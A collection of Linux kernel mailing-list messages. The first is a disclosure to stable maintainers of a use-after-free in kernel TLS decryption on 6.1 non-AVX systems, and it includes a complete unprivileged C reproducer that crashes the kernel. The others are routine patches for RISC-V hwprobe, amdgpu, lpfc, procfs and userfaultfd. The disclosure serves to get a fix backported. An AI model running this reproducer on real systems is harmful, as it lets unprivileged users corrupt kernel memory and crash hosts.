Hi all,
Commit 41532b785e (tls: separate no-async decryption request handling from async) [1] actually fixes a UAF read and write bug in the kernel, and should be backported to 6.1. As of now, it has only been backported as far as 6.6, which was done when the patch was first committed. The commit message mentions a non-reproducible UAF that was previously observed, but we managed to hit the vulnerable case.
The vulnerable case arises when a user wraps an existing crypto algorithm (such as gcm or ghash) in cryptd. By default, cryptd-wrapped algorithms have a higher priority than the base variant. tls_decrypt_sg allocates the aead request, and triggers the crypto handling with tls_do_decryption. When the crypto is handled by cryptd, it is dispatched to a worker and initially returns -EINPROGRESS. While the older LTS versions (5.4, 5.10, and 5.15) appear to have an additional crypto_wait_req call for this case, 6.1 just returns success and frees the aead request. The cryptd worker can still be operating on the request at that point, which causes a UAF.
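A rough sketch of the race, paraphrased from the flow above (not verbatim 6.1 code):

/*
 * tls_decrypt_sg()                        (paraphrased, not verbatim)
 *   aead_req allocated
 *   tls_do_decryption()
 *     crypto_aead_decrypt(aead_req)  -> cryptd queues the request to a
 *                                       worker and returns -EINPROGRESS
 *     6.1 without the backport treats the non-async case as complete
 *     here; 5.4/5.10/5.15 instead call crypto_wait_req() and block.
 *   aead_req freed on return
 *
 * cryptd worker, still running:
 *   reads/writes aead_req            -> UAF read and write
 */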
However, this vulnerability only occurs on CPUs without AVX support (perhaps this is why there were reproducibility difficulties). With AVX, aesni_init calls simd_register_aeads_compat to force the crypto subsystem to use the SIMD version, which avoids the async issues raised by cryptd. While I doubt many people are running host systems without AVX these days, this environment is pretty common in VMs when QEMU uses KVM without the "-cpu host" flag.
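For example (an illustrative setup, not taken from the original report): a guest booted with "qemu-system-x86_64 -enable-kvm" and no explicit -cpu option gets QEMU's default qemu64 model, which does not advertise AVX, so the cryptd-based async path is reachable.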
The following repro can be triggered by unprivileged users. Multishot KASAN shows multiple UAF reads and writes, and the system eventually panics with a null dereference.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/tcp.h>
#include <linux/tls.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <linux/if_alg.h>
#include <signal.h>
#include <sys/wait.h>
#include <time.h>
struct tls_conn {
	int tx;
	int rx;
};

void tls_enable(int sk, int type) {
	/* TLS 1.3 with AES-GCM-256; the all-zero key/IV material from the
	 * zero-initialized struct is fine for triggering the bug. */
	struct tls12_crypto_info_aes_gcm_256 tls_ci = {
		.info.version = TLS_1_3_VERSION,
		.info.cipher_type = TLS_CIPHER_AES_GCM_256,
	};
	setsockopt(sk, IPPROTO_TCP, TCP_ULP, "tls", sizeof("tls"));
	setsockopt(sk, SOL_TLS, type, &tls_ci, sizeof(tls_ci));
}

struct tls_conn *tls_create_conn(int port) {
	int s0 = socket(AF_INET, SOCK_STREAM, 0);
	int s1 = socket(AF_INET, SOCK_STREAM, 0);
	struct sockaddr_in a = {
		.sin_family = AF_INET,
		.sin_port = htons(port),
		.sin_addr.s_addr = htonl(INADDR_ANY),
	};
	bind(s0, (struct sockaddr *)&a, sizeof(a));
	listen(s0, 1);
	connect(s1, (struct sockaddr *)&a, sizeof(a));
	int s2 = accept(s0, 0, 0);
	close(s0);
	tls_enable(s1, TLS_TX);
	tls_enable(s2, TLS_RX);
	struct tls_conn *t = calloc(1, sizeof(struct tls_conn));
	t->tx = s1;
	t->rx = s2;
	return t;
}

void tls_destroy_conn(struct tls_conn *t) {
	close(t->tx);
	close(t->rx);
	free(t);
}

int tls_send(struct tls_conn *t, char *data, size_t size) {
	return sendto(t->tx, data, size, 0, NULL, 0);
}

int tls_recv(struct tls_conn *t, char *data, size_t size) {
	return recvfrom(t->rx, data, size, 0, NULL, NULL);
}

int crypto_register_algo(char *type, char *name) {
	/* Binding an AF_ALG socket instantiates the algorithm, pulling
	 * cryptd(gcm(aes)) ahead of the base gcm(aes) in priority. */
	int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
	struct sockaddr_alg sa = {};
	sa.salg_family = AF_ALG;
	strcpy(sa.salg_type, type);
	strcpy(sa.salg_name, name);
	bind(s, (struct sockaddr *)&sa, sizeof(sa));
	close(s);
	return 0;
}

int main(void) {
	char buff[0x2000];
	crypto_register_algo("aead", "cryptd(gcm(aes))");
	struct tls_conn *t = tls_create_conn(20000);
	tls_send(t, buff, 0x10);
	/* Decryption on the RX side goes through cryptd -> UAF. */
	tls_recv(t, buff, 0x100);
}
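For reference, the repro needs no special privileges or build flags; something like "gcc -o tls_uaf repro.c" and running the binary as a regular user on a KASAN kernel in a non-AVX VM (as described above) should produce the UAF reports on the tls_recv() path.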
Feel free to let us know if you have any questions or if there is anything else we can do to help.
Best,
Will
Savy
[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?…
The hwprobe vDSO data for some keys, like MISALIGNED_VECTOR_PERF,
is determined by an asynchronous kthread. This can create a race
condition where the kthread finishes after the vDSO data has
already been populated, causing userspace to read stale values.
To fix this race, a new 'ready' flag is added to the vDSO data,
initialized to 'false' during arch_initcall_sync. This flag is
checked by both the vDSO's user-space code and the riscv_hwprobe
syscall. The syscall serves as a one-time gate, using a completion
to wait for any pending probes before populating the data and
setting the flag to 'true', thus ensuring userspace reads fresh
values on its first request.
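For context, a minimal userspace query of the affected key looks like the
following (an illustrative sketch, assuming the uapi names from
<asm/hwprobe.h>; with this patch, the first such call takes the syscall
path and waits for the async probes):

#include <asm/hwprobe.h>	/* struct riscv_hwprobe, RISCV_HWPROBE_* keys */
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>

int main(void)
{
	struct riscv_hwprobe pair = {
		.key = RISCV_HWPROBE_KEY_MISALIGNED_VECTOR_PERF,
	};

	/* Before the vDSO data is marked ready, the vDSO falls back to
	 * this syscall, which now waits for pending async probes. */
	if (syscall(__NR_riscv_hwprobe, &pair, 1, 0, NULL, 0) == 0)
		printf("key %lld -> value %llu\n",
		       (long long)pair.key, (unsigned long long)pair.value);
	return 0;
}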
Reported-by: Tsukasa OI <research_trasio(a)irq.a4lg.com>
Closes: https://lore.kernel.org/linux-riscv/760d637b-b13b-4518-b6bf-883d55d44e7f@ir…
Fixes: e7c9d66e313b ("RISC-V: Report vector unaligned access speed hwprobe")
Cc: Palmer Dabbelt <palmer(a)dabbelt.com>
Cc: Alexandre Ghiti <alexghiti(a)rivosinc.com>
Cc: Olof Johansson <olof(a)lixom.net>
Cc: stable(a)vger.kernel.org
Reviewed-by: Alexandre Ghiti <alexghiti(a)rivosinc.com>
Co-developed-by: Palmer Dabbelt <palmer(a)dabbelt.com>
Signed-off-by: Palmer Dabbelt <palmer(a)dabbelt.com>
Signed-off-by: Jingwei Wang <wangjingwei(a)iscas.ac.cn>
---
Changes in v8:
- Based on feedback from Alexandre, reverted the initcall back to
arch_initcall_sync since the DO_ONCE logic makes a late init redundant.
- Added the required Reviewed-by and Signed-off-by tags and fixed minor
formatting nits.
Changes in v7:
- Refined the on-demand synchronization by using the DO_ONCE_SLEEPABLE
macro.
- Fixed a build error for nommu configs and addressed several coding
style issues reported by the CI.
Changes in v6:
- Based on Palmer's feedback, reworked the synchronization to be on-demand,
deferring the wait until the first hwprobe syscall via a 'ready' flag.
This avoids the boot-time regression from v5's approach.
Changes in v5:
- Reworked the synchronization logic to a robust "sentinel-count"
pattern based on feedback from Alexandre.
- Fixed a "multiple definition" linker error for nommu builds by changing
the header-file stub functions to `static inline`, as pointed out by Olof.
- Updated the commit message to better explain the rationale for moving
the vDSO initialization to `late_initcall`.
Changes in v4:
- Reworked the synchronization mechanism based on feedback from Palmer
and Alexandre.
- Instead of a post-hoc refresh, this version introduces a robust
completion-based framework using an atomic counter to ensure async
probes are finished before populating the vDSO.
- Moved the vdso data initialization to a late_initcall to avoid
impacting boot time.
Changes in v3:
- Retained existing blank line.
Changes in v2:
- Addressed feedback from Yixun regarding #ifdef CONFIG_MMU usage.
- Updated commit message to provide a high-level summary.
- Added Fixes tag for commit e7c9d66e313b.
v1: https://lore.kernel.org/linux-riscv/20250521052754.185231-1-wangjingwei@isc…
arch/riscv/include/asm/hwprobe.h | 7 +++
arch/riscv/include/asm/vdso/arch_data.h | 6 ++
arch/riscv/kernel/sys_hwprobe.c | 70 ++++++++++++++++++----
arch/riscv/kernel/unaligned_access_speed.c | 9 ++-
arch/riscv/kernel/vdso/hwprobe.c | 2 +-
5 files changed, 79 insertions(+), 15 deletions(-)
diff --git a/arch/riscv/include/asm/hwprobe.h b/arch/riscv/include/asm/hwprobe.h
index 7fe0a379474ae2c6..5fe10724d307dc99 100644
--- a/arch/riscv/include/asm/hwprobe.h
+++ b/arch/riscv/include/asm/hwprobe.h
@@ -41,4 +41,11 @@ static inline bool riscv_hwprobe_pair_cmp(struct riscv_hwprobe *pair,
return pair->value == other_pair->value;
}
+#ifdef CONFIG_MMU
+void riscv_hwprobe_register_async_probe(void);
+void riscv_hwprobe_complete_async_probe(void);
+#else
+static inline void riscv_hwprobe_register_async_probe(void) {}
+static inline void riscv_hwprobe_complete_async_probe(void) {}
+#endif
#endif
diff --git a/arch/riscv/include/asm/vdso/arch_data.h b/arch/riscv/include/asm/vdso/arch_data.h
index da57a3786f7a53c8..88b37af55175129b 100644
--- a/arch/riscv/include/asm/vdso/arch_data.h
+++ b/arch/riscv/include/asm/vdso/arch_data.h
@@ -12,6 +12,12 @@ struct vdso_arch_data {
/* Boolean indicating all CPUs have the same static hwprobe values. */
__u8 homogeneous_cpus;
+
+ /*
+ * A gate to check and see if the hwprobe data is actually ready, as
+ * probing is deferred to avoid boot slowdowns.
+ */
+ __u8 ready;
};
#endif /* __RISCV_ASM_VDSO_ARCH_DATA_H */
diff --git a/arch/riscv/kernel/sys_hwprobe.c b/arch/riscv/kernel/sys_hwprobe.c
index 0b170e18a2beba57..44201160b9c43177 100644
--- a/arch/riscv/kernel/sys_hwprobe.c
+++ b/arch/riscv/kernel/sys_hwprobe.c
@@ -5,6 +5,9 @@
* more details.
*/
#include <linux/syscalls.h>
+#include <linux/completion.h>
+#include <linux/atomic.h>
+#include <linux/once.h>
#include <asm/cacheflush.h>
#include <asm/cpufeature.h>
#include <asm/hwprobe.h>
@@ -452,28 +455,32 @@ static int hwprobe_get_cpus(struct riscv_hwprobe __user *pairs,
return 0;
}
-static int do_riscv_hwprobe(struct riscv_hwprobe __user *pairs,
- size_t pair_count, size_t cpusetsize,
- unsigned long __user *cpus_user,
- unsigned int flags)
-{
- if (flags & RISCV_HWPROBE_WHICH_CPUS)
- return hwprobe_get_cpus(pairs, pair_count, cpusetsize,
- cpus_user, flags);
+#ifdef CONFIG_MMU
- return hwprobe_get_values(pairs, pair_count, cpusetsize,
- cpus_user, flags);
+static DECLARE_COMPLETION(boot_probes_done);
+static atomic_t pending_boot_probes = ATOMIC_INIT(1);
+
+void riscv_hwprobe_register_async_probe(void)
+{
+ atomic_inc(&pending_boot_probes);
}
-#ifdef CONFIG_MMU
+void riscv_hwprobe_complete_async_probe(void)
+{
+ if (atomic_dec_and_test(&pending_boot_probes))
+ complete(&boot_probes_done);
+}
-static int __init init_hwprobe_vdso_data(void)
+static int complete_hwprobe_vdso_data(void)
{
struct vdso_arch_data *avd = vdso_k_arch_data;
u64 id_bitsmash = 0;
struct riscv_hwprobe pair;
int key;
+ if (unlikely(!atomic_dec_and_test(&pending_boot_probes)))
+ wait_for_completion(&boot_probes_done);
+
/*
* Initialize vDSO data with the answers for the "all CPUs" case, to
* save a syscall in the common case.
@@ -501,13 +508,52 @@ static int __init init_hwprobe_vdso_data(void)
* vDSO should defer to the kernel for exotic cpu masks.
*/
avd->homogeneous_cpus = id_bitsmash != 0 && id_bitsmash != -1;
+
+ /*
+ * Make sure all the VDSO values are visible before we look at them.
+ * This pairs with the implicit "no speculatively visible accesses"
+ * barrier in the VDSO hwprobe code.
+ */
+ smp_wmb();
+ avd->ready = true;
+ return 0;
+}
+
+static int __init init_hwprobe_vdso_data(void)
+{
+ struct vdso_arch_data *avd = vdso_k_arch_data;
+
+ /*
+ * Prevent the vDSO cached values from being used, as they're not ready
+ * yet.
+ */
+ avd->ready = false;
return 0;
}
arch_initcall_sync(init_hwprobe_vdso_data);
+#else
+
+static int complete_hwprobe_vdso_data(void) { return 0; }
+
#endif /* CONFIG_MMU */
+static int do_riscv_hwprobe(struct riscv_hwprobe __user *pairs,
+ size_t pair_count, size_t cpusetsize,
+ unsigned long __user *cpus_user,
+ unsigned int flags)
+{
+ DO_ONCE_SLEEPABLE(complete_hwprobe_vdso_data);
+
+ if (flags & RISCV_HWPROBE_WHICH_CPUS)
+ return hwprobe_get_cpus(pairs, pair_count, cpusetsize,
+ cpus_user, flags);
+
+ return hwprobe_get_values(pairs, pair_count, cpusetsize,
+ cpus_user, flags);
+}
+
SYSCALL_DEFINE5(riscv_hwprobe, struct riscv_hwprobe __user *, pairs,
size_t, pair_count, size_t, cpusetsize, unsigned long __user *,
cpus, unsigned int, flags)
diff --git a/arch/riscv/kernel/unaligned_access_speed.c b/arch/riscv/kernel/unaligned_access_speed.c
index ae2068425fbcd207..aa912c62fb70ba0e 100644
--- a/arch/riscv/kernel/unaligned_access_speed.c
+++ b/arch/riscv/kernel/unaligned_access_speed.c
@@ -379,6 +379,7 @@ static void check_vector_unaligned_access(struct work_struct *work __always_unus
static int __init vec_check_unaligned_access_speed_all_cpus(void *unused __always_unused)
{
schedule_on_each_cpu(check_vector_unaligned_access);
+ riscv_hwprobe_complete_async_probe();
return 0;
}
@@ -473,8 +474,12 @@ static int __init check_unaligned_access_all_cpus(void)
per_cpu(vector_misaligned_access, cpu) = unaligned_vector_speed_param;
} else if (!check_vector_unaligned_access_emulated_all_cpus() &&
IS_ENABLED(CONFIG_RISCV_PROBE_VECTOR_UNALIGNED_ACCESS)) {
- kthread_run(vec_check_unaligned_access_speed_all_cpus,
- NULL, "vec_check_unaligned_access_speed_all_cpus");
+ riscv_hwprobe_register_async_probe();
+ if (IS_ERR(kthread_run(vec_check_unaligned_access_speed_all_cpus,
+ NULL, "vec_check_unaligned_access_speed_all_cpus"))) {
+ pr_warn("Failed to create vec_unalign_check kthread\n");
+ riscv_hwprobe_complete_async_probe();
+ }
}
/*
diff --git a/arch/riscv/kernel/vdso/hwprobe.c b/arch/riscv/kernel/vdso/hwprobe.c
index 2ddeba6c68dda09b..bf77b4c1d2d8e803 100644
--- a/arch/riscv/kernel/vdso/hwprobe.c
+++ b/arch/riscv/kernel/vdso/hwprobe.c
@@ -27,7 +27,7 @@ static int riscv_vdso_get_values(struct riscv_hwprobe *pairs, size_t pair_count,
* homogeneous, then this function can handle requests for arbitrary
* masks.
*/
- if ((flags != 0) || (!all_cpus && !avd->homogeneous_cpus))
+ if ((flags != 0) || (!all_cpus && !avd->homogeneous_cpus) || unlikely(!avd->ready))
return riscv_hwprobe(pairs, pair_count, cpusetsize, cpus, flags);
/* This is something we can handle, fill out the pairs. */
--
2.50.1
From: Guchun Chen <guchun.chen(a)amd.com>
[ Upstream commit 248b061689a40f4fed05252ee2c89f87cf26d7d8 ]
In the current code, when a PCI error state pci_channel_io_normal is
detected, PCI_ERS_RESULT_CAN_RECOVER is reported to the PCI driver, and
the PCI driver continues the execution of the PCI resume callback
report_resume via pci_walk_bridge. The callback finally reaches
amdgpu_pci_resume, where the write lock is released unconditionally
without having been acquired first. In this case, a deadlock happens
when other threads start to acquire the read lock.
To fix this, add a member to the amdgpu_device structure to cache the
pci_channel_state, and only continue the execution in amdgpu_pci_resume
when it is pci_channel_io_frozen.
Fixes: c9a6b82f45e2 ("drm/amdgpu: Implement DPC recovery")
Suggested-by: Andrey Grodzovsky <andrey.grodzovsky(a)amd.com>
Signed-off-by: Guchun Chen <guchun.chen(a)amd.com>
Reviewed-by: Andrey Grodzovsky <andrey.grodzovsky(a)amd.com>
Signed-off-by: Alex Deucher <alexander.deucher(a)amd.com>
Signed-off-by: Sasha Levin <sashal(a)kernel.org>
[Shivani: Modified to apply on 5.10.y]
Signed-off-by: Shivani Agarwal <shivani.agarwal(a)broadcom.com>
---
drivers/gpu/drm/amd/amdgpu/amdgpu.h | 1 +
drivers/gpu/drm/amd/amdgpu/amdgpu_device.c | 6 ++++++
2 files changed, 7 insertions(+)
diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
index ff5555353eb4..683bbefc39c1 100644
--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
@@ -997,6 +997,7 @@ struct amdgpu_device {
bool in_pci_err_recovery;
struct pci_saved_state *pci_state;
+ pci_channel_state_t pci_channel_state;
};
static inline struct amdgpu_device *drm_to_adev(struct drm_device *ddev)
diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
index 40d2f0ed1c75..8efd3ee2621f 100644
--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
@@ -4944,6 +4944,8 @@ pci_ers_result_t amdgpu_pci_error_detected(struct pci_dev *pdev, pci_channel_sta
return PCI_ERS_RESULT_DISCONNECT;
}
+ adev->pci_channel_state = state;
+
switch (state) {
case pci_channel_io_normal:
return PCI_ERS_RESULT_CAN_RECOVER;
@@ -5079,6 +5081,10 @@ void amdgpu_pci_resume(struct pci_dev *pdev)
DRM_INFO("PCI error: resume callback!!\n");
+ /* Only continue execution for the case of pci_channel_io_frozen */
+ if (adev->pci_channel_state != pci_channel_io_frozen)
+ return;
+
for (i = 0; i < AMDGPU_MAX_RINGS; ++i) {
struct amdgpu_ring *ring = adev->rings[i];
--
2.40.4
Hi,
The first four patches in this series are miscellaneous fixes and
improvements in the Cadence and TI CSI-RX drivers around probing, fwnode
and link creation.
The last two patches add support for transmitting multiple pixels per
clock cycle on the internal bus between the Cadence CSI-RX bridge and
the TI CSI-RX wrapper. As this internal bus is 32 bits wide, the maximum
number of pixels that can be transmitted per cycle depends on the
format's bit width. Additionally, the downstream element must support
unpacking of multiple pixels.

Thus, we export a module function that the downstream driver can use to
negotiate the pixels per cycle on the output pixel stream of the Cadence
bridge (see the sketch below).
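Roughly, a downstream call site would look like this (a hypothetical
sketch: the helper name, its signature, and the ti_csi2rx_* names are
assumed for illustration; the real interface is what the new
include/media/cadence/cdns-csi2rx.h from this series declares):

#include <media/v4l2-subdev.h>
#include <media/cadence/cdns-csi2rx.h>

static u8 ti_csi2rx_pick_ppc(struct v4l2_subdev *source, u8 bpp)
{
	/* 32-bit internal bus: e.g. 8bpp -> 4 pixels/cycle, 16bpp -> 2. */
	u8 ppc = 32 / bpp;

	/* Ask the Cadence bridge to clamp this to what it (and the
	 * downstream unpacker) actually supports. */
	if (cdns_csi2rx_negotiate_ppc(source, 0 /* source pad */, &ppc))
		ppc = 1;	/* fall back to one pixel per cycle */

	return ppc;
}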
Signed-off-by: Jai Luthra <jai.luthra(a)ideasonboard.com>
---
Changes in v3:
- Move cdns-csi2rx header to include/media
- Export symbol from cdns-csi2rx.c to be used only through
the j721e-csi2rx.c module namespace
- Other minor fixes suggested by Sakari
- Add Abhilash's T-by tags
- Link to v2: https://lore.kernel.org/r/20250410-probe_fixes-v2-0-801bc6eebdea@ideasonboa…
Changes in v2:
- Rebase on v6.15-rc1
- Fix lkp warnings in PATCH 5/6 missing header for FIELD_PREP
- Add R-By tags from Devarsh and Changhuang
- Link to v1: https://lore.kernel.org/r/20250324-probe_fixes-v1-0-5cd5b9e1cfac@ideasonboa…
---
Jai Luthra (6):
media: ti: j721e-csi2rx: Use devm_of_platform_populate
media: ti: j721e-csi2rx: Use fwnode_get_named_child_node
media: ti: j721e-csi2rx: Fix source subdev link creation
media: cadence: csi2rx: Implement get_fwnode_pad op
media: cadence: cdns-csi2rx: Support multiple pixels per clock cycle
media: ti: j721e-csi2rx: Support multiple pixels per clock
MAINTAINERS | 1 +
drivers/media/platform/cadence/cdns-csi2rx.c | 74 ++++++++++++++++------
drivers/media/platform/ti/Kconfig | 3 +-
.../media/platform/ti/j721e-csi2rx/j721e-csi2rx.c | 65 ++++++++++++++-----
include/media/cadence/cdns-csi2rx.h | 19 ++++++
5 files changed, 127 insertions(+), 35 deletions(-)
---
base-commit: 19272b37aa4f83ca52bdf9c16d5d81bdd1354494
change-id: 20250314-probe_fixes-7e0ec33c7fee
Best regards,
--
Jai Luthra <jai.luthra(a)ideasonboard.com>
From: James Smart <jsmart2021(a)gmail.com>
[ Upstream commit 1854f53ccd88ad4e7568ddfafafffe71f1ceb0a6 ]
If an FC link down transition occurs while PLOGIs are outstanding to
fabric well-known addresses, outstanding ABTS requests may result in a
NULL pointer dereference, and driver unload requests may hang with
repeated "2878" log messages.
The link down processing results in ABTS requests for the outstanding
ELS requests. The Abort WQEs are sent for the ELSs before the driver has
set the link state to down, so the driver sends the Abort expecting an
ABTS to be sent on the wire, and the Abort request stalls waiting for
the link to come up. In some conditions the driver may auto-complete the
ELSs; thus, if the link does come up, the Abort completions may
reference an invalid structure.

Fix by ensuring that the Abort sets the flag to avoid link traffic when
it is issued under conditions where the link has failed.
Link: https://lore.kernel.org/r/20211020211417.88754-7-jsmart2021@gmail.com
Co-developed-by: Justin Tee <justin.tee(a)broadcom.com>
Signed-off-by: Justin Tee <justin.tee(a)broadcom.com>
Signed-off-by: James Smart <jsmart2021(a)gmail.com>
Signed-off-by: Martin K. Petersen <martin.petersen(a)oracle.com>
Signed-off-by: Sasha Levin <sashal(a)kernel.org>
[Shivani: Modified to apply on 5.10.y]
Signed-off-by: Shivani Agarwal <shivani.agarwal(a)broadcom.com>
---
drivers/scsi/lpfc/lpfc_sli.c | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
index ff39c596f000..49931577da38 100644
--- a/drivers/scsi/lpfc/lpfc_sli.c
+++ b/drivers/scsi/lpfc/lpfc_sli.c
@@ -11432,10 +11432,12 @@ lpfc_sli_abort_iotag_issue(struct lpfc_hba *phba, struct lpfc_sli_ring *pring,
if (cmdiocb->iocb_flag & LPFC_IO_FOF)
abtsiocbp->iocb_flag |= LPFC_IO_FOF;
- if (phba->link_state >= LPFC_LINK_UP)
- iabt->ulpCommand = CMD_ABORT_XRI_CN;
- else
+ if (phba->link_state < LPFC_LINK_UP ||
+ (phba->sli_rev == LPFC_SLI_REV4 &&
+ phba->sli4_hba.link_state.status == LPFC_FC_LA_TYPE_LINK_DOWN))
iabt->ulpCommand = CMD_CLOSE_XRI_CN;
+ else
+ iabt->ulpCommand = CMD_ABORT_XRI_CN;
abtsiocbp->iocb_cmpl = lpfc_sli_abort_els_cmpl;
abtsiocbp->vport = vport;
--
2.40.4
The quilt patch titled
Subject: proc: proc_maps_open allow proc_mem_open to return NULL
has been removed from the -mm tree. Its filename was
proc-proc_maps_open-allow-proc_mem_open-to-return-null.patch
This patch was dropped because it was merged into the mm-hotfixes-stable branch
of git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
------------------------------------------------------
From: Jialin Wang <wjl.linux(a)gmail.com>
Subject: proc: proc_maps_open allow proc_mem_open to return NULL
Date: Fri, 8 Aug 2025 00:54:55 +0800
Commit 65c66047259f ("proc: fix the issue of proc_mem_open returning
NULL") caused proc_maps_open() to return -ESRCH when proc_mem_open()
returns NULL. This breaks legitimate /proc/<pid>/maps access for kernel
threads, since kernel threads have a NULL mm_struct.
The regression causes perf to fail and exit when profiling a kernel
thread:
# perf record -v -g -p $(pgrep kswapd0)
...
couldn't open /proc/65/task/65/maps
This patch partially reverts the commit to fix it.
Link: https://lkml.kernel.org/r/20250807165455.73656-1-wjl.linux@gmail.com
Fixes: 65c66047259f ("proc: fix the issue of proc_mem_open returning NULL")
Signed-off-by: Jialin Wang <wjl.linux(a)gmail.com>
Cc: Penglei Jiang <superman.xpt(a)gmail.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
fs/proc/task_mmu.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
--- a/fs/proc/task_mmu.c~proc-proc_maps_open-allow-proc_mem_open-to-return-null
+++ a/fs/proc/task_mmu.c
@@ -340,8 +340,8 @@ static int proc_maps_open(struct inode *
priv->inode = inode;
priv->mm = proc_mem_open(inode, PTRACE_MODE_READ);
- if (IS_ERR_OR_NULL(priv->mm)) {
- int err = priv->mm ? PTR_ERR(priv->mm) : -ESRCH;
+ if (IS_ERR(priv->mm)) {
+ int err = PTR_ERR(priv->mm);
seq_release_private(inode, file);
return err;
_
Patches currently in -mm which might be from wjl.linux(a)gmail.com are
The quilt patch titled
Subject: userfaultfd: fix a crash in UFFDIO_MOVE when PMD is a migration entry
has been removed from the -mm tree. Its filename was
userfaultfd-fix-a-crash-in-uffdio_move-when-pmd-is-a-migration-entry.patch
This patch was dropped because it was merged into the mm-hotfixes-stable branch
of git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
------------------------------------------------------
From: Suren Baghdasaryan <surenb(a)google.com>
Subject: userfaultfd: fix a crash in UFFDIO_MOVE when PMD is a migration entry
Date: Wed, 6 Aug 2025 15:00:22 -0700
When UFFDIO_MOVE encounters a migration PMD entry, it proceeds with
obtaining a folio and accessing it even though the entry is swp_entry_t.
Add the missing check and let split_huge_pmd() handle migration entries.
While at it, also remove an unnecessary folio check.
[surenb(a)google.com: remove extra folio check, per David]
Link: https://lkml.kernel.org/r/20250807200418.1963585-1-surenb@google.com
Link: https://lkml.kernel.org/r/20250806220022.926763-1-surenb@google.com
Fixes: adef440691ba ("userfaultfd: UFFDIO_MOVE uABI")
Signed-off-by: Suren Baghdasaryan <surenb(a)google.com>
Reported-by: syzbot+b446dbe27035ef6bd6c2(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/all/68794b5c.a70a0220.693ce.0050.GAE@google.com/
Reviewed-by: Peter Xu <peterx(a)redhat.com>
Acked-by: David Hildenbrand <david(a)redhat.com>
Cc: Andrea Arcangeli <aarcange(a)redhat.com>
Cc: Lokesh Gidra <lokeshgidra(a)google.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
mm/userfaultfd.c | 15 +++++++++------
1 file changed, 9 insertions(+), 6 deletions(-)
--- a/mm/userfaultfd.c~userfaultfd-fix-a-crash-in-uffdio_move-when-pmd-is-a-migration-entry
+++ a/mm/userfaultfd.c
@@ -1821,13 +1821,16 @@ ssize_t move_pages(struct userfaultfd_ct
/* Check if we can move the pmd without splitting it. */
if (move_splits_huge_pmd(dst_addr, src_addr, src_start + len) ||
!pmd_none(dst_pmdval)) {
- struct folio *folio = pmd_folio(*src_pmd);
+ /* Can be a migration entry */
+ if (pmd_present(*src_pmd)) {
+ struct folio *folio = pmd_folio(*src_pmd);
- if (!folio || (!is_huge_zero_folio(folio) &&
- !PageAnonExclusive(&folio->page))) {
- spin_unlock(ptl);
- err = -EBUSY;
- break;
+ if (!is_huge_zero_folio(folio) &&
+ !PageAnonExclusive(&folio->page)) {
+ spin_unlock(ptl);
+ err = -EBUSY;
+ break;
+ }
}
spin_unlock(ptl);
_
Patches currently in -mm which might be from surenb(a)google.com are
mm-limit-the-scope-of-vma_start_read.patch
mm-change-vma_start_read-to-drop-rcu-lock-on-failure.patch
selftests-proc-test-procmap_query-ioctl-while-vma-is-concurrently-modified.patch
fs-proc-task_mmu-factor-out-proc_maps_private-fields-used-by-procmap_query.patch
fs-proc-task_mmu-execute-procmap_query-ioctl-under-per-vma-locks.patch